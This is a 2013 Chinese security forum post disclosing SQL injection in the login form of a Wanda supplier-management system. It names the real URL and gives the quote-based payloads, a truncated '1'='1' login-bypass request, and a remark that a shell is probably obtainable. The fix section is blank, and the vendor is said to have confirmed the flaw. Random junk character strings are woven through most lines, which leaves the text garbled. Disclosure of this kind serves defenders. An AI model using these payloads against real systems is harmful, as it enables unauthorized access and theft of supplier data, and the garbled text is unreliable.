找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2618|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。9 I7 t2 T, [! `% {# A. l7 p
详细说明:$ D' U- F1 D  ]" c8 l& u. p3 g
万达scm系统登陆框sql注入。
# K6 J# h6 M4 C, q3 Y
3 G4 j( L2 }) J1 _8 w, p* Uhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
; w8 p) j9 y; t
% B- K( s0 o9 s3 I- K  s9 A: R" Y( f8 L! ?* l1 m
500错误。
( q& U5 Z# q2 g7 p$ l" @5 G$ R+ b! i; C. z% w% a1 ~+ @% Z6 \  b
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。8 q" @: c0 R7 b% B6 S
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
( _, K! h( K6 q4 O截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
% ?* E9 C: b# d" r经过分析,登陆验证的过程应该是:+ Y7 o7 U* E9 D& V' `5 w1 _! z% }
% N# [( r5 Z9 r  o' W4 o
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。6 v  G* v! O5 }  M( K
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
7 K9 P: k* L: t% k6 d! p3 R' q$ Q: t' p% l5 p- i! w9 K& w
oracle数据库,存在注入点。@大连万达,你怎么看?. p% J" N+ l, T& a0 b' Y$ z
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png" z# O6 G9 U3 [/ \2 ?

& l# C4 F" L# g5 q3 v系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
' T& W) B% D1 D2 J4 H* G漏洞证明:
- ?, T9 x5 }* Z2 W- P2 ?万达scm系统登陆框sql注入。7 R/ L( W6 {: A+ x( v7 |& I

' _# v. G+ H4 @% H6 i6 D# Bhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27/ \9 R4 ^- M; s. F
& i+ O" W9 y2 B; s2 P$ |4 p
. j8 {; d: ^4 Y1 T$ v$ B
500错误。
7 ]$ L3 ]3 F3 M) P. s2 ~6 U9 A
& V- h+ a0 h4 U% K& O' e' K用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
* N5 A/ X+ y1 a' qhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png: U3 c* }0 X6 E. b; ~1 h, s
8 m" z3 s8 R$ X1 W# o, O

3 O8 ^1 P* }* L; w1 @(截图有一点问题)
0 d1 J2 z! h! p" c( X1 ?/ ?
6 j- U6 ]; x9 z" r6 K  ?怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
/ q( v( _* `7 n6 L( I( m  W0 l4 j% H( g
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。9 F0 ?  L* D+ U( f
0 R0 s/ }+ F' p9 J
绕过:
) Q% L/ E+ z' t1 B' F2 f) R1 hhttp://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1" B0 N1 y: ]; M& ^. ~& Z% u
; U4 u5 G% d7 E2 D' Y! |' G$ }2 u

4 z5 W% C8 o9 C3 Z& q8 xoracle数据库,存在注入点。@大连万达,你怎么看?
* o/ K! L' r$ ]5 B; O4 y+ A​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。; l" `9 f! R  e
3 q+ {; _  P: J8 h( N2 n3 p
修复方案:$ E. @# r, x2 d: ~
。。。
6 v& E% G( ~9 {  J
( r! o( A, H  ^0 d3 _1 K; _( {$ k& f8 t# w
厂商已经确认
; `1 y; G; {1 ~& C
/ ?- }2 \3 v& o0 V, |4 Q' U[/td][/tr]
5 i& Q4 ^7 w5 K- v  a7 y[/table]
$ w& D/ R- S3 n8 [
) X/ e) O' T- T6 i( y& }
  I: L$ B% u. j+ E. k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表